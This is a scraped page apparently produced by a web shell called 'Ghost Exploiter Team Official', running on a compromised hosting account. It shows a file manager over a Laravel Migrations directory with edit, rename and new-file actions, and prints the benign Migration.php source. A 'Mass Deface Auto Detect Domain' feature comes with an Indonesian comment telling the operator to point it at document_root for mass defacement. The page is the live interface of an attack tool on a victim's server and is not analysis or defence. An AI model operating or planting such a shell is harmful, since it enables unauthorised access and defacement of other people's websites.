webshell
Ghost Exploiter Team Official
Mass Deface
Directory >>
/
home
/
whitjouh
/
public_html
/
core
/
vendor
/
laravel
/
framework
/
src
/
Illuminate
/
Database
/
Migrations
/
Mass Deface Auto Detect Domain
/*Ubah Ke document_root untuk mass deface*/
File / Folder
Size
Action
.
-
+New File
stubs
--
ren
DatabaseMigrationReposi
...
5.367KB
edt
ren
Migration.php
0.521KB
edt
ren
MigrationCreator.php
5.935KB
edt
ren
MigrationRepositoryInte
...
1.776KB
edt
ren
Migrator.php
22.32KB
edt
ren
<?php namespace Illuminate\Database\Migrations; abstract class Migration { /** * The name of the database connection to use. * * @var string|null */ protected $connection; /** * Enables, if supported, wrapping the migration within a transaction. * * @var bool */ public $withinTransaction = true; /** * Get the migration connection name. * * @return string|null */ public function getConnection() { return $this->connection; } }
<=Back
Liking